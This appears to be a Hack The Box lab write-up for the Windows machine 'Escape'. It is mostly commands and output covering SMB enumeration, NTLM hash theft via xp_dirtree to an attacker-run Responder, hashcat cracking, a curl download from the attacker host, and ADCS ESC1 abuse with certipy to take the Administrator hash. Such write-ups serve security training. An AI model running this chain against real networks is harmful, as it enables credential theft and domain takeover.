Escape

Recon

nmap_scan.log

Open 10.129.228.253:53
Open 10.129.228.253:88
Open 10.129.228.253:135
Open 10.129.228.253:139
Open 10.129.228.253:389
Open 10.129.228.253:445
Open 10.129.228.253:464
Open 10.129.228.253:593
Open 10.129.228.253:636
Open 10.129.228.253:1433
Open 10.129.228.253:3269
Open 10.129.228.253:3268
Open 10.129.228.253:5985
Open 10.129.228.253:9389
Open 10.129.228.253:49667
Open 10.129.228.253:49689
Open 10.129.228.253:49690
Open 10.129.228.253:49715
Open 10.129.228.253:49725
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.228.253

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2024-11-27 03:21:49Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after:  2074-01-05T23:03:57
| MD5:   ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
| SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
|_ssl-date: 2024-11-27T03:23:19+00:00; +7h59m59s from scanner time.
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-27T03:23:19+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after:  2074-01-05T23:03:57
| MD5:   ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
| SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
1433/tcp  open  ms-sql-s      syn-ack Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-11-27T03:23:20+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-27T03:20:57
| Not valid after:  2054-11-27T03:20:57
| MD5:   d620:b64f:550c:32fc:adfb:c990:3e91:87fb
| SHA-1: c6c8:253c:4863:6ab0:fd7c:f8c9:71a1:53cd:a8bd:598f
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-27T03:23:19+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after:  2074-01-05T23:03:57
| MD5:   ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
| SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-27T03:23:19+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after:  2074-01-05T23:03:57
| MD5:   ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
| SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49689/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         syn-ack Microsoft Windows RPC
49715/tcp open  msrpc         syn-ack Microsoft Windows RPC
49725/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-11-27T03:22:40
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 29662/tcp): CLEAN (Timeout)
|   Check 2 (port 8810/tcp): CLEAN (Timeout)
|   Check 3 (port 12096/udp): CLEAN (Timeout)
|   Check 4 (port 41824/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s

SMB (139, 445)

└─$ netexec smb 10.129.228.253 -u 'guest' -p '' --shares
SMB         10.129.228.253  445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.129.228.253  445    DC               [+] sequel.htb\guest:
SMB         10.129.228.253  445    DC               [*] Enumerated shares
SMB         10.129.228.253  445    DC               Share           Permissions     Remark
SMB         10.129.228.253  445    DC               -----           -----------     ------
SMB         10.129.228.253  445    DC               ADMIN$                          Remote Admin
SMB         10.129.228.253  445    DC               C$                              Default share
SMB         10.129.228.253  445    DC               IPC$            READ            Remote IPC
SMB         10.129.228.253  445    DC               NETLOGON                        Logon server share
SMB         10.129.228.253  445    DC               Public          READ
SMB         10.129.228.253  445    DC               SYSVOL                          Logon server share

└─$ smbclient -U guest% //10.129.228.253/Public
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Nov 19 06:51:25 2022
  ..                                  D        0  Sat Nov 19 06:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 08:39:43 2022

                5184255 blocks of size 4096. 1441003 blocks available
smb: \> get 'SQL Server Procedures.pdf'
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \'SQL
smb: \> prompt
smb: \> mget *
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (109.2 KiloBytes/sec) (average 109.2 KiloBytes/sec)
smb: \> exit

Creds: PublicUser:GuestUserCantWrite1

MSSQL (1433)

└─$ netexec smb 10.129.228.253 -u 'PublicUser' -p 'GuestUserCantWrite1' --shares
SMB         10.129.228.253  445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.129.228.253  445    DC               [+] sequel.htb\PublicUser:GuestUserCantWrite1
SMB         10.129.228.253  445    DC               [-] Error enumerating shares: STATUS_ACCESS_DENIED

└─$ netexec winrm 10.129.228.253 -u 'PublicUser' -p 'GuestUserCantWrite1'
WINRM       10.129.228.253  5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
WINRM       10.129.228.253  5985   DC               [-] sequel.htb\PublicUser:GuestUserCantWrite1

└─$ netexec ldap 10.129.228.253 -u 'PublicUser' -p 'GuestUserCantWrite1'
SMB         10.129.228.253  445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAPS       10.129.228.253  636    DC               [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
LDAPS       10.129.228.253  636    DC               [+] sequel.htb\PublicUser:GuestUserCantWrite1

└─$ netexec mssql 10.129.228.253 -u 'PublicUser' -p 'GuestUserCantWrite1' --local-auth
MSSQL       10.129.228.253  1433   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
MSSQL       10.129.228.253  1433   DC               [+] DC\PublicUser:GuestUserCantWrite1

└─$ impacket-mssqlclient 'SEQUAL.HTB'/'PublicUser':'GuestUserCantWrite1'@'10.129.228.253'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands

SQL (PublicUser  guest@master)> enable_xp_cmdshell
ERROR(DC\SQLMOCK): Line 105: User does not have permission to perform this action.
ERROR(DC\SQLMOCK): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(DC\SQLMOCK): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(DC\SQLMOCK): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (PublicUser  guest@master)> enum_db
name     is_trustworthy_on
------   -----------------
master                   0
tempdb                   0
model                    0
msdb                     1

Looks like we can't just get RCE right of the bat. Database is also empty, so nothing much.

Since we are on Windows we can try to steal the NTLM hash and crack it.

sql_svc

└─$ sudo responder -I tun0
---
SQL (PublicUser  guest@master)> xp_dirtree \\10.10.14.99\letmein
---
[SMB] NTLMv2-SSP Client   : 10.129.228.253
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:78cce724b5e42a34:9815268188A21958658DEE45868556F8:010100000000000080DFEFE01140DB01E1AA31D36CCBA84400000000020008005A0048005A00380001001E00570049004E002D004500520056005200550054004C0055004F005200560004003400570049004E002D004500520056005200550054004C0055004F00520056002E005A0048005A0038002E004C004F00430041004C00030014005A0048005A0038002E004C004F00430041004C00050014005A0048005A0038002E004C004F00430041004C000700080080DFEFE01140DB010600040002000000080030003000000000000000000000000030000072613B41AF92C4F4F914BE46B70E4C4187237DEA8975C71245EE02C8EC53FA200A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00390039000000000000000000

➜ .\hashcat.exe --show .\hashes
5600 | NetNTLMv2 | Network Protocol
➜ .\hashcat.exe -m 5600 -a 0 .\hashes .\rockyou.txt
sql_svc::sequel:78cce724b5e42a34:9815268188A21958658DEE45868556F8:010100000000000080DFEFE01140DB01E1AA31D36CCBA84400000000020008005A0048005A00380001001E00570049004E002D004500520056005200550054004C0055004F005200560004003400570049004E002D004500520056005200550054004C0055004F00520056002E005A0048005A0038002E004C004F00430041004C00030014005A0048005A0038002E004C004F00430041004C00050014005A0048005A0038002E004C004F00430041004C000700080080DFEFE01140DB010600040002000000080030003000000000000000000000000030000072613B41AF92C4F4F914BE46B70E4C4187237DEA8975C71245EE02C8EC53FA200A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00390039000000000000000000:REGGIE1234ronnie

└─$ netexec mssql 10.129.228.253 -u 'sql_svc' -p 'REGGIE1234ronnie'
MSSQL       10.129.228.253  1433   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
MSSQL       10.129.228.253  1433   DC               [+] sequel.htb\sql_svc:REGGIE1234ronnie

└─$ netexec winrm 10.129.228.253 -u 'sql_svc' -p 'REGGIE1234ronnie'
WINRM       10.129.228.253  5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
WINRM       10.129.228.253  5985   DC               [+] sequel.htb\sql_svc:REGGIE1234ronnie (Pwn3d!)

Privilege Escalation (Ryan.Cooper)

└─$ evil-winrm -i 10.129.228.253 -u 'sql_svc' -p 'REGGIE1234ronnie'
*Evil-WinRM* PS C:\SQLServer\Logs> cat ERRORLOG.BAK | sls pass

2022-11-18 13:43:06.75 spid18s     Password policy update was successful.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
---
└─$ netexec winrm 10.129.228.253 -u 'Ryan.Cooper' -p 'NuclearMosquito3'
WINRM       10.129.228.253  5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
WINRM       10.129.228.253  5985   DC               [+] sequel.htb\Ryan.Cooper:NuclearMosquito3 (Pwn3d!)

Creds: Ryan.Cooper:NuclearMosquito3

User.txt

└─$ evil-winrm -i 10.129.228.253 -u 'Ryan.Cooper' -p 'NuclearMosquito3'
*Evil-WinRM* PS C:\Users\Ryan.Cooper> ls -fil *.txt -rec -file | % { $_; echo " "; cat $_.FullName; }

    Directory: C:\Users\Ryan.Cooper\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       11/26/2024   7:21 PM             34 user.txt

da4b64e3349dabce0dbc747c2a799cc9

Privilege Escalation

Nothing much from winpeas.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Music> curl 10.10.14.99/wp.exe -out wp.exe
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Music> .\wp.exe | tee -filepath wp.log
...
ÉÍÍÍÍÍÍÍÍÍÍ¹ AV Information
  [X] Exception: Invalid namespace
    No AV was detected!!
    Not Found
...
ÉÍÍÍÍÍÍÍÍÍÍ¹ UAC Status
È If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
    ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
    EnableLUA: 1
    LocalAccountTokenFilterPolicy:
    FilterAdministratorToken:
      [*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
      [-] Only the RID-500 local admin account can be used for lateral movement.
...

Enumerate AD

└─$ bloodhound-python -c all -u Ryan.Cooper -p NuclearMosquito3 -d sequel.htb -ns 10.129.228.253 --zip -op ryan

No outbound permissions, but we are part of Certificate Service group..

ESC1

└─$ certipy-ad find -u Ryan.Cooper -p NuclearMosquito3 -target sequel.htb -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC-CA' via RRP
[*] Got CA configuration for 'sequel-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sequel-DC-CA
    DNS Name                            : dc.sequel.htb
    Certificate Subject                 : CN=sequel-DC-CA, DC=sequel, DC=htb
    Certificate Serial Number           : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Certificate Validity Start          : 2022-11-18 20:58:46+00:00
    Certificate Validity End            : 2121-11-18 21:08:46+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : SEQUEL.HTB\Administrators
      Access Rights
        ManageCertificates              : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        ManageCa                        : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Enroll                          : SEQUEL.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : UserAuthentication
    Display Name                        : UserAuthentication
    Certificate Authorities             : sequel-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Client Authentication
                                          Secure Email
                                          Encrypting File System
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 10 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Domain Users
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Administrator
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
        Write Property Principals       : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
    [!] Vulnerabilities
      ESC1                              : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication

https://www.thehacker.recipes/ad/movement/adcs/certificate-templates#esc1-template-allows-san

└─$ certipy-ad req -u "Ryan.Cooper@sequel.htb" -p "NuclearMosquito3" -dc-ip "10.129.228.253" -target "sequel.htb" -ca 'sequel-DC-CA' -template 'UserAuthentication' -upn 'Administrator@sequel.htb' -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'sequel.htb' at '10.129.228.253'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.228.253[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.228.253[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 15
[*] Got certificate with UPN 'Administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.228.253
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

└─$ sudo ntpdate 10.129.228.253
2024-11-26 23:27:35.479593 (-0500) +28799.048561 +/- 0.037762 10.129.228.253 s1 no-leap
CLOCK: time stepped by 28799.048561

└─$ echo $(( 28799.048561 / 3600 ))
7.9997357113888885

└─$ faketime -f +8h certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.228.253
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee

Root.txt

*Evil-WinRM* PS C:\Users\Administrator> ls -fil *.txt -rec -file | % { $_; echo " "; cat $_.FullName; }

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       11/26/2024   7:21 PM             34 root.txt

0c8da0934f430de59e418a98520e58f5

PreviousEpsilon NextForgot

Last updated 8 months ago

hashtagRecon

hashtagSMB (139, 445)

hashtagMSSQL (1433)

hashtagsql_svc

hashtagPrivilege Escalation (Ryan.Cooper)

hashtagUser.txt

hashtagPrivilege Escalation

hashtagESC1

hashtagRoot.txt